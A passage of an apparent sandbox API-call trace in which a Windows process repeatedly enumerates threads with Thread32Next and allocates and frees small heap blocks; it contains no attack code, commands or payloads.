(in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.866] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.867] GetTickCount () returned 0xbab5 [0186.867] GetCurrentThreadId () returned 0x5d8 [0186.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.867] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.875] GetTickCount () returned 0xbac5 [0186.875] GetCurrentThreadId () returned 0x5d8 [0186.875] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.875] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.875] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.877] GetTickCount () returned 0xbac5 [0186.877] GetCurrentThreadId () returned 0x5d8 [0186.877] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.877] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.878] GetTickCount () returned 0xbac5 [0186.878] GetCurrentThreadId () returned 0x5d8 [0186.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.878] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.880] GetTickCount () returned 0xbac5 [0186.880] GetCurrentThreadId () returned 0x5d8 [0186.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.880] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.881] GetTickCount () returned 0xbac5 [0186.881] GetCurrentThreadId () returned 0x5d8 [0186.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.881] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.882] GetTickCount () returned 0xbac5 [0186.882] GetCurrentThreadId () returned 0x5d8 [0186.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.883] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.883] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.884] GetTickCount () returned 0xbad5 [0186.884] GetCurrentThreadId () returned 0x5d8 [0186.884] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.884] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.885] GetTickCount () returned 0xbad5 [0186.885] GetCurrentThreadId () returned 0x5d8 [0186.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.886] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.886] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.887] GetTickCount () returned 0xbad5 [0186.887] GetCurrentThreadId () returned 0x5d8 [0186.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.887] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.888] GetTickCount () returned 0xbad5 [0186.888] GetCurrentThreadId () returned 0x5d8 [0186.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.889] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.890] GetTickCount () returned 0xbad5 [0186.890] GetCurrentThreadId () returned 0x5d8 [0186.890] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.890] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.891] GetTickCount () returned 0xbad5 [0186.891] GetCurrentThreadId () returned 0x5d8 [0186.891] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.891] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.892] GetTickCount () returned 0xbad5 [0186.892] GetCurrentThreadId () returned 0x5d8 [0186.892] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.893] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.893] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.894] GetTickCount () returned 0xbad5 [0186.894] GetCurrentThreadId () returned 0x5d8 [0186.894] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.894] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.894] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.895] GetTickCount () returned 0xbad5 [0186.895] GetCurrentThreadId () returned 0x5d8 [0186.895] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.896] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.897] GetTickCount () returned 0xbad5 [0186.897] GetCurrentThreadId () returned 0x5d8 [0186.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.897] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.898] GetTickCount () returned 0xbad5 [0186.898] GetCurrentThreadId () returned 0x5d8 [0186.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.898] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.900] GetTickCount () returned 0xbae4 [0186.900] GetCurrentThreadId () returned 0x5d8 [0186.900] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.900] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.901] GetTickCount () returned 0xbae4 [0186.901] GetCurrentThreadId () returned 0x5d8 [0186.901] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.902] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.903] GetTickCount () returned 0xbae4 [0186.903] GetCurrentThreadId () returned 0x5d8 [0186.903] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.903] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.903] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.904] GetTickCount () returned 0xbae4 [0186.904] GetCurrentThreadId () returned 0x5d8 [0186.904] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.904] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.904] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.905] GetTickCount () returned 0xbae4 [0186.905] GetCurrentThreadId () returned 0x5d8 [0186.905] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.905] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.905] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.906] GetTickCount () returned 0xbae4 [0186.906] GetCurrentThreadId () returned 0x5d8 [0186.906] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.907] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.907] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.908] GetTickCount () returned 0xbae4 [0186.908] GetCurrentThreadId () returned 0x5d8 [0186.908] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.908] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.908] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.909] GetTickCount () returned 0xbae4 [0186.909] GetCurrentThreadId () returned 0x5d8 [0186.909] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.909] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.909] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.911] GetTickCount () returned 0xbae4 [0186.911] GetCurrentThreadId () returned 0x5d8 [0186.911] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.911] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.911] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.912] GetTickCount () returned 0xbae4 [0186.912] GetCurrentThreadId () returned 0x5d8 [0186.912] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.912] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.912] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.913] GetTickCount () returned 0xbae4 [0186.913] GetCurrentThreadId () returned 0x5d8 [0186.913] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.914] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.914] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.915] GetTickCount () returned 0xbaf4 [0186.915] GetCurrentThreadId () returned 0x5d8 [0186.915] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.915] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.915] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.916] GetTickCount () returned 0xbaf4 [0186.916] GetCurrentThreadId () returned 0x5d8 [0186.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.916] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.916] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.917] GetTickCount () returned 0xbaf4 [0186.917] GetCurrentThreadId () returned 0x5d8 [0186.918] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.918] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.918] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.919] GetTickCount () returned 0xbaf4 [0186.919] GetCurrentThreadId () returned 0x5d8 [0186.919] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.919] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.919] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.920] GetTickCount () returned 0xbaf4 [0186.921] GetCurrentThreadId () returned 0x5d8 [0186.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.921] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.921] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.922] GetTickCount () returned 0xbaf4 [0186.922] GetCurrentThreadId () returned 0x5d8 [0186.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.922] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.922] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.923] GetTickCount () returned 0xbaf4 [0186.923] GetCurrentThreadId () returned 0x5d8 [0186.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.924] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.925] GetTickCount () returned 0xbaf4 [0186.925] GetCurrentThreadId () returned 0x5d8 [0186.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.925] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.925] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.926] GetTickCount () returned 0xbaf4 [0186.926] GetCurrentThreadId () returned 0x5d8 [0186.926] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.926] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.926] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.928] GetTickCount () returned 0xbaf4 [0186.928] GetCurrentThreadId () returned 0x5d8 [0186.928] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.928] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.929] GetTickCount () returned 0xbaf4 [0186.929] GetCurrentThreadId () returned 0x5d8 [0186.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.929] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.931] GetTickCount () returned 0xbb03 [0186.931] GetCurrentThreadId () returned 0x5d8 [0186.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.932] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.933] GetTickCount () returned 0xbb03 [0186.933] GetCurrentThreadId () returned 0x5d8 [0186.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.933] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.935] GetTickCount () returned 0xbb03 [0186.935] GetCurrentThreadId () returned 0x5d8 [0186.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.935] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.936] GetTickCount () returned 0xbb03 [0186.936] GetCurrentThreadId () returned 0x5d8 [0186.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.937] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.938] GetTickCount () returned 0xbb03 [0186.938] GetCurrentThreadId () returned 0x5d8 [0186.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.938] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.939] GetTickCount () returned 0xbb03 [0186.939] GetCurrentThreadId () returned 0x5d8 [0186.939] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.940] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.940] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.941] GetTickCount () returned 0xbb03 [0186.941] GetCurrentThreadId () returned 0x5d8 [0186.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.941] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.942] GetTickCount () returned 0xbb03 [0186.942] GetCurrentThreadId () returned 0x5d8 [0186.942] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.943] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.943] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.944] GetTickCount () returned 0xbb03 [0186.944] GetCurrentThreadId () returned 0x5d8 [0186.944] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.944] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.945] GetTickCount () returned 0xbb03 [0186.945] GetCurrentThreadId () returned 0x5d8 [0186.945] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.946] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.946] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.947] GetTickCount () returned 0xbb13 [0186.947] GetCurrentThreadId () returned 0x5d8 [0186.947] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.947] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.947] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.948] GetTickCount () returned 0xbb13 [0186.948] GetCurrentThreadId () returned 0x5d8 [0186.948] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.949] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.950] GetTickCount () returned 0xbb13 [0186.950] GetCurrentThreadId () returned 0x5d8 [0186.950] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.950] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.950] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.951] GetTickCount () returned 0xbb13 [0186.951] GetCurrentThreadId () returned 0x5d8 [0186.951] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.952] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.953] GetTickCount () returned 0xbb13 [0186.953] GetCurrentThreadId () returned 0x5d8 [0186.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.953] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.953] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.954] GetTickCount () returned 0xbb13 [0186.954] GetCurrentThreadId () returned 0x5d8 [0186.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.955] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.956] GetTickCount () returned 0xbb13 [0186.956] GetCurrentThreadId () returned 0x5d8 [0186.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.956] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.956] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.957] GetTickCount () returned 0xbb13 [0186.957] GetCurrentThreadId () returned 0x5d8 [0186.957] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.958] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.958] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.959] GetTickCount () returned 0xbb13 [0186.959] GetCurrentThreadId () returned 0x5d8 [0186.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.959] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.959] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.960] GetTickCount () returned 0xbb13 [0186.960] GetCurrentThreadId () returned 0x5d8 [0186.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.960] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.962] GetTickCount () returned 0xbb23 [0186.962] GetCurrentThreadId () returned 0x5d8 [0186.962] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.962] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.962] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.963] GetTickCount () returned 0xbb23 [0186.963] GetCurrentThreadId () returned 0x5d8 [0186.963] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.964] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.964] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.965] GetTickCount () returned 0xbb23 [0186.965] GetCurrentThreadId () returned 0x5d8 [0186.965] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.965] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.965] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.966] GetTickCount () returned 0xbb23 [0186.966] GetCurrentThreadId () returned 0x5d8 [0186.966] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.967] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.967] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.968] GetTickCount () returned 0xbb23 [0186.968] GetCurrentThreadId () returned 0x5d8 [0186.968] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.968] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.968] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.969] GetTickCount () returned 0xbb23 [0186.969] GetCurrentThreadId () returned 0x5d8 [0186.969] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.970] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.970] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.971] GetTickCount () returned 0xbb23 [0186.971] GetCurrentThreadId () returned 0x5d8 [0186.971] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.971] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.971] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.973] GetTickCount () returned 0xbb23 [0186.973] GetCurrentThreadId () returned 0x5d8 [0186.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.973] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.973] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.974] GetTickCount () returned 0xbb23 [0186.974] GetCurrentThreadId () returned 0x5d8 [0186.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.975] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.976] GetTickCount () returned 0xbb23 [0186.976] GetCurrentThreadId () returned 0x5d8 [0186.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.977] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.977] Thread32Next 